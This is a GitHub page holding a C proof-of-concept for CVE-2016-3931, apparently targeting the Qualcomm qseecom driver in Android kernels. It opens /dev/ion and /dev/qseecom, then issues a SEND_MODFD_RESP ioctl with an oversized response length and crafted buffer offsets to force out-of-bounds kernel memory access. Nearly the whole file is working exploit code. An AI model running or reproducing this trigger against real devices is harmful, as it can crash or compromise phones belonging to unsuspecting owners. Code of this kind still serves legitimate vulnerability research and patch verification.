-
Notifications
You must be signed in to change notification settings - Fork 25
/
Copy pathCVE-2016-3931.c
91 lines (70 loc) · 2.39 KB
/
CVE-2016-3931.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <errno.h>
#include "../kernel/msm/include/uapi/linux/qseecom.h"
#include "../kernel/msm/drivers/staging/android/uapi/linux/ion.h"
int ion_test()
{
int ion_fd, ret;
char* iondev = "/dev/ion";
printf("open:%s\n",iondev);
ion_fd = open(iondev, O_RDWR);
if (ion_fd < 0) {
printf("Failed to open:%s, %s\n", iondev, strerror(errno));
exit(EXIT_FAILURE);
}
printf("ioctl on device: ION ALLOC\n");
struct ion_allocation_data data;
data.len = 0x1000;
data.align = 0x1000;
data.flags = 27;//ION_HEAP_CARVEOUT_MASK;
data.heap_mask = 1<<27;
ret = ioctl(ion_fd, ION_IOC_ALLOC, &data);
printf("ret is :0x%x, flags:0x%x\n", ret, data.flags);
struct ion_fd_data ifd;
ifd.handle = data.handle;
printf("ioctl on device: ION IOC SHARE\n");
ret = ioctl(ion_fd, ION_IOC_SHARE, &ifd);
printf("ret is :0x%x, fd is: 0x%x\n", ret, ifd.fd);
return ifd.fd;
}
void test_qsee_send_modfd_resp()
{
int ifd = ion_test();
int fd, i,ret;
char* dev = "/dev/qseecom";
printf("open:%s\n",dev);
fd = open(dev, O_RDWR);
if (fd < 0) {
printf("Failed to open:%s, %s\n", dev, strerror(errno));
exit(EXIT_FAILURE);
}
printf("ioctl on device:REGISTER LISTENER REQ\n");
struct qseecom_register_listener_req rcvd_lstnr;
rcvd_lstnr.ifd_data_fd = ifd;
ret = ioctl(fd, QSEECOM_IOCTL_REGISTER_LISTENER_REQ, &rcvd_lstnr);
printf("ret is :0x%x\n", ret);
printf("ioctl on device:SEND MODFD CMD REQ\n");
struct qseecom_send_modfd_listener_resp arg;
arg.resp_buf_ptr = (void*)0x1000;//malloc(100);
for(i=0; i<4;i++){
arg.resp_len = 0xc0000000;
arg.ifd_data[i].cmd_buf_offset = arg.resp_len - 4;
arg.ifd_data[i].fd = ifd;
}
ret = ioctl(fd, QSEECOM_IOCTL_SEND_MODFD_RESP, &arg);
printf("ret is :0x%x\n", ret);
}
int main(int argc, char *argv[])
{
printf("main begins...\n");
test_qsee_send_modfd_resp();
printf("main end\n");
return 0;
}